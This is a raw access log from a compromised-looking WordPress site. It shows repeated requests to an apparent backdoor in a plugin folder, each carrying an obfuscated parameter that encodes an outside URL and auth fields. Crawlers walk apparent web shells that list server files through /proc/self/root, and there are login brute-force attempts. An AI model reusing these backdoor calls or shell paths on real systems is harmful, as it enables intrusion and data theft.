103.154.176.224 - - [20/Mar/2026:01:08:13 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0"
179.188.53.243 - - [20/Mar/2026:01:03:16 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938323934372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393334372q3634353262383365343566333330633961346462636432313062633437613338222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.241.31 - - [20/Mar/2026:01:08:25 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/src HTTP/1.1" 200 21283 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [20/Mar/2026:01:08:29 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/cwd/.tmb HTTP/1.1" 200 20051 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/cwd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.244.43 - - [20/Mar/2026:01:08:31 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [20/Mar/2026:01:03:56 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333031392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393431392q6561383338383330623337616361346230613733373732356535656265313065222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:04:23 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333035382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393435382q3065663238376635323864393631643130626135376561656438383261386361222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:04:58 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333038352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393438352q6331346263313731383330323066663263373130343361363863306332323238222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.79 57.141.18.79 - - [20/Mar/2026:01:09:58 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/imddc187 HTTP/1.1" 200 18612 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:06:53 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333132302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393532302q3137666261623036336663653331613233653335666135613866363332346434222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.9 57.141.18.9 - - [20/Mar/2026:01:12:20 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/rss.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.243.128 - - [20/Mar/2026:01:12:22 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/pxp-agent/tasks-cache HTTP/1.1" 200 16997 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/pxp-agent" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.80 57.141.18.80 - - [20/Mar/2026:01:12:22 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-customize-widgets.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.100 57.141.18.100 - - [20/Mar/2026:01:12:23 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/common.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13007 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.88 57.141.18.88 - - [20/Mar/2026:01:12:24 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/about-rtl.min.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13014 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.74.169 - - [20/Mar/2026:01:12:24 -0300] "GET /shop/stagnant/astrofel01226085523.phtml HTTP/1.1" 200 209234 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [20/Mar/2026:01:07:31 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333233382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393633382q3935616230633066386238636238663439616330663835383432373666313834222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.241.31 - - [20/Mar/2026:01:12:34 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/mnt HTTP/1.1" 200 15853 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [20/Mar/2026:01:12:35 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
57.141.18.88 57.141.18.88 - - [20/Mar/2026:01:12:36 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/l10n-rtl.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 17949 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.74.169 - - [20/Mar/2026:01:12:47 -0300] "GET /shop/flavourless/subtonic01190213993.phtml HTTP/1.1" 200 206483 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [20/Mar/2026:01:07:53 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333237332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393637332q3033383331353561323765373035313733383435653835336263396236323866222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
217.216.72.111 - - [20/Mar/2026:01:12:56 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
217.216.72.111 - - [20/Mar/2026:01:12:58 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
179.188.53.243 - - [20/Mar/2026:01:08:14 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333239342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393639342q3130323034633364666432616665373337656134616637353033646531646262222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
66.249.74.161 - - [20/Mar/2026:01:13:14 -0300] "GET /shop/solas/ophthalmoscopy013250778881.phtml HTTP/1.1" 200 212467 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [20/Mar/2026:01:08:35 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333331352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393731352q3565363735363261623639346338623836663465336132363634336534303033222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:08:56 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333333362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393733362q3935633639363231356436613137343638363231383566623138623637626130222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
66.249.74.160 - - [20/Mar/2026:01:13:55 -0300] "GET /shop/apyrexia/louver013641864855.phtml HTTP/1.1" 200 209979 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.18.64 57.141.18.64 - - [20/Mar/2026:01:13:58 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/forms.css&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css HTTP/1.1" 200 13006 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.43 57.141.18.43 - - [20/Mar/2026:01:14:01 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/blocks HTTP/1.1" 200 312469 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.36 57.141.18.36 - - [20/Mar/2026:01:14:13 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/functions.wp-scripts.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 28760 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:09:17 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333335372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393735372q3665363463313539306631366330623130366139666133353964623633363631222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.243.128 - - [20/Mar/2026:01:14:20 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform HTTP/1.1" 200 117845 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [20/Mar/2026:01:14:41 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/etc HTTP/1.1" 200 16035 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
179.188.53.243 - - [20/Mar/2026:01:10:35 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333337382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393737382q3330373933323237643166353339353235323964613634383531386437373032222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.27 57.141.18.27 - - [20/Mar/2026:01:15:35 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/link-template.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 98975 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.241.31 - - [20/Mar/2026:01:15:45 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sbin/pam_tally2&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sbin HTTP/1.1" 200 15591 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sbin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.14 57.141.18.14 - - [20/Mar/2026:01:15:48 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-network-query.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 33880 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.40 57.141.18.40 - - [20/Mar/2026:01:15:50 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-block.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 38850 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.103 57.141.18.103 - - [20/Mar/2026:01:15:51 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-theme-json.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 180900 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:11:35 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333435382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393835382q3230373837643331623836616166666163306139383163623732616461363163222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:12:17 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333531372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393931372q3632623462353538306562656233303232363761346539663330376431653231222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
66.249.74.161 - - [20/Mar/2026:01:17:34 -0300] "GET /shop/reverencing/pitchblack013165452214.phtml HTTP/1.1" 200 215267 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [20/Mar/2026:01:12:39 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333535392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393935392q3261353366636263316632643163656337303439353566633839393066363836222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:13:00 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333538302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333937393938302q3366333337303361623735313230333730636461366366366366663033663530222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:13:55 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333630312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303030312q3033396532353934383632303933646534333233383335333765656361303863222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.21 57.141.18.21 - - [20/Mar/2026:01:18:56 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/ms-default-constants.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:14:17 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333635372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303035372q3334383730323466326230653965343132626134346261323732613237653238222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:14:46 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333637392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303037392q3866643663633361386665613164396139623564643762613839613966313034222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:15:39 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333730382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303130382q3333386666636663666539323036613233346332373632303864343133316661222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.241.31 - - [20/Mar/2026:01:20:50 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/src/debug HTTP/1.1" 200 16225 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/src" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
179.188.53.243 - - [20/Mar/2026:01:16:35 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333736312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303136312q6539336265613139373031613434366330666630303064623036356433653865222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.48 57.141.18.48 - - [20/Mar/2026:01:22:22 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/mu-plugins HTTP/1.1" 200 15324 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:17:23 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333831372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303231372q6662653361636537626162636338653435386461636338313939343032313361222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.92 57.141.18.92 - - [20/Mar/2026:01:22:24 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/index.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content HTTP/1.1" 200 13235 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.68 57.141.18.68 - - [20/Mar/2026:01:22:25 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/user-profile.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
